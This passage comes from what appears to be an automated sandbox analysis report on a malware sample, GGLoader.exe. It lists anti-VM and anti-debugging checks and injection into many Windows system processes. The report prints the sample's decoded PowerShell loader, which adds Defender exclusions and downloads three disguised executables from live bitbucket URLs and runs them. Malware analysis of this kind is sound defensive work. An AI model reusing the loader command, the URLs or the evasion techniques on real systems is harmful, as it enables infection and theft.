                        Source: svchost.exe, 00000035.00000000.2296597019.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
                        Source: svchost.exe, 00000035.00000000.2296026118.000001D559020000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware
                        Source: svchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                        Source: GGLoader.exe, 00000000.00000002.1714327459.000000000152B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}2igv
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                        Source: GGLoader.exeBinary or memory string: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
                        Source: svchost.exe, 00000035.00000000.2297078138.000001D559386000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                        Source: dwm.exe, 0000002E.00000000.2237368637.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
                        Source: GGLoader.exe, 00000000.00000002.1714729669.00000000034D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware@E
                        Source: svchost.exe, 00000035.00000000.2297078138.000001D5593A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
                        Source: lsass.exe, 0000002C.00000002.2961113290.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223603284.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2956835957.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2231046863.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2273754697.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.2954077537.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2274757893.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2954277150.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2962965792.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2277933173.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.2964974668.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: lsass.exe, 0000002C.00000002.2972274642.00000202C037F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                        Source: svchost.exe, 00000035.00000000.2294844228.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
                        Source: svchost.exe, 0000002D.00000002.2959155286.000002A66066B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: svchost.exe, 00000031.00000002.2952925182.000002295CE00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                        Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                        Source: dwm.exe, 0000002E.00000000.2237368637.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

                        Anti Debugging

                        Source: C:\Users\user\Desktop\GGLoader.exe | Code function: 0_2_00007FFD9B885D4D CheckRemoteDebuggerPresent, 0_2_00007FFD9B885D4D
                        Source: C:\Users\user\Desktop\GGLoader.exe | Process queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_00793F90 IsDebuggerPresent,GetModuleHandleW,GetProcAddress,GetTickCount64,NtDelayExecution,GetTickCount64, 6_2_00793F90
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007BB2BB mov eax, dword ptr fs:[00000030h] 6_2_007BB2BB
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007AFF51 mov ecx, dword ptr fs:[00000030h] 6_2_007AFF51
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00C0B2BB mov eax, dword ptr fs:[00000030h] 35_2_00C0B2BB
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00BFFF51 mov ecx, dword ptr fs:[00000030h] 35_2_00BFFF51
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007BDA5F GetProcessHeap, 6_2_007BDA5F
                        Source: C:\Users\user\Desktop\GGLoader.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007A5B6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_007A5B6A
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007A9BF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_007A9BF3
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007A5CCC SetUnhandledExceptionFilter, 6_2_007A5CCC
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007A5DD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_007A5DD5
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00BF9BF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00BF9BF3
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00BF5B6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00BF5B6A
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00BF5CCC SetUnhandledExceptionFilter, 35_2_00BF5CCC
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00BF5DD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 35_2_00BF5DD5
                        Source: C:\Windows\System32\conhost.exe | Code function: 39_2_000002505E597E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002505E597E70
                        Source: C:\Windows\System32\conhost.exe | Code function: 39_2_000002505E59B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002505E59B50C
                        Source: C:\Windows\System32\conhost.exe | Code function: 41_2_000001C08C1B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001C08C1B7E70
                        Source: C:\Windows\System32\conhost.exe | Code function: 41_2_000001C08C1BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001C08C1BB50C
                        Source: C:\Windows\System32\dllhost.exe | Code function: 42_2_000002131118B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000002131118B50C
                        Source: C:\Windows\System32\dllhost.exe | Code function: 42_2_0000021311187E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_0000021311187E70
                        Source: C:\Windows\System32\winlogon.exe | Code function: 43_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_00000225DC647E70
                        Source: C:\Windows\System32\winlogon.exe | Code function: 43_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_00000225DC64B50C
                        Source: C:\Users\user\Desktop\GGLoader.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara match | File source: amsi64_7520.amsi.csv, type: OTHER
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7520, type: MEMORYSTR
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Windows\System32\dllhost.exe | Code function: 42_2_0000000140001DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 42_2_0000000140001DB4
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: DC612908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 612D2908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\dwm.exe EIP: AED92908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 87992908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 53772908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5D532908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 67D2908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5B392908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 59042908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A9E72908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 73162908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4E862908
                        Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 473C2908
                        Source: C:\Users\user\Desktop\GGLoader.exe | Process created: Base64 decoded <#grx#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;";<#efr#> Add-MpPreference <#fpg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nzh#> -Force <#aqd#>;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe', <#pjx#> (Join-Path <#vcy#> -Path $env:Temp <#ycy#> -ChildPath 'LicenseGet.exe'))<#bgk#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe', <#sbd#> (Join-Path <#hqu#> -Path $env:Temp <#kws#> -ChildPath 'LicCheck.exe'))<#kix#>; (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe', <#duq#> (Join-Path <#hht#> -Path $env:Temp <#usr#> -ChildPath 'LicSend.exe'))<#hwn#>; Start-Process -FilePath <#cmj#> (Join-Path -Path $env:Temp <#guj#> -ChildPath 'LicenseGet.exe')<#tab#>; Start-Process -FilePath <#iun#> (Join-Path -Path $env:Temp <#vie#> -ChildPath 'LicCheck.exe')<#njw#>; Start-Process -FilePath <#ixi#> (Join-Path -Path $env:Temp <#tml#> -ChildPath 'LicSend.exe')<#dng#>
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeNtQuerySystemInformation: Direct from: 0x7FF7D3B994FEJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 87C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17AABF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1600D650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 23FD1160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9A6A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 13713CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226B1810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 208F5FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2505E560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C51E3F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C08C180000 value starts with: 4D5A
